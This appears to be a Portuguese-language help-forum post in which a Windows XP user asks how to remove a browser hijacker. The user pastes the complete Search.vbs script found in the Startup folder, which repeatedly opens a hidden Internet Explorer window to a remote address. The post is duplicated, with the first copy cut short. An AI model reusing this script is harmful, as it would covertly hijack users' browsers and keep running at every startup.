Me ajudem por favor!!!! meu pc foi contaminado com um Spyware chamado vbs.searchwww.com ele alterou a pagina inicial do meu navegador para esse mesmo endereço (vbs.searchwww.com). Quando eu notei que isso havia acontecido eu alterei a página inicial para o que era anteriormente e ele (o Spyware) não voltou a ser minha página atual deixando minha configuração intacta. Porém sempre que estou conectado ele tenta abrir (o meu anti pop-up bloqueia)uma outra janela com esse endereço (vbs.searchwww.com)... Já instalei e passei o Spybot e ele nada acusou!!!
Outra coisa que eu não sei se ajuda é que eu pesquisei em um site em inglês e achei o seguinte sobre ele :
O Ad-Aware não pode dectar search.vbs em
Documents and Settings>All Users>Start Menu>Programs>Startup>Search.vbs
Quando eu abro o arquivo Search.vbs eu encontro o seguinte lá dentro:
while 1
wscript.sleep 3600000
set search = createobject("internetexplorer.application")
Pergunta
SPX
Olá pessoal,
Me ajudem por favor!!!! meu pc foi contaminado com um Spyware chamado vbs.searchwww.com ele alterou a pagina inicial do meu navegador para esse mesmo endereço (vbs.searchwww.com). Quando eu notei que isso havia acontecido eu alterei a página inicial para o que era anteriormente e ele (o Spyware) não voltou a ser minha página atual deixando minha configuração intacta. Porém sempre que estou conectado ele tenta abrir (o meu anti pop-up bloqueia)uma outra janela com esse endereço (vbs.searchwww.com)... Já instalei e passei o Spybot e ele nada acusou!!!
Outra coisa que eu não sei se ajuda é que eu pesquisei em um site em inglês e achei o seguinte sobre ele :
O Ad-Aware não pode dectar search.vbs em
Documents and Settings>All Users>Start Menu>Programs>Startup>Search.vbs
Quando eu abro o arquivo Search.vbs eu encontro o seguinte lá dentro:
while 1
wscript.sleep 3600000
set search = createobject("internetexplorer.application")
search.height = 0
search.menubar = 0
search.statusbar = 0
search.toolbar = 0
search.width = 0
search.navigate "http://vbs.searchwww.com/vbs.cgi"
do while search.busy
wscript.sleep 1000
loop
if search.height = 0 and search.width = 0 then
search.quit
else
search.visible = 1
end if
wend
Se eu deletar esse arquivo o problema acaba???? o que eu tenho que fazer???
ME AJUDEM POR FAVOR!!!
Obs.: Eu tenho o Win XP professional com antivirus AVG e o Firewall Sygate instalados e perfeitamente atualizados em meu PC.
Link para o comentário
Compartilhar em outros sites
2 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.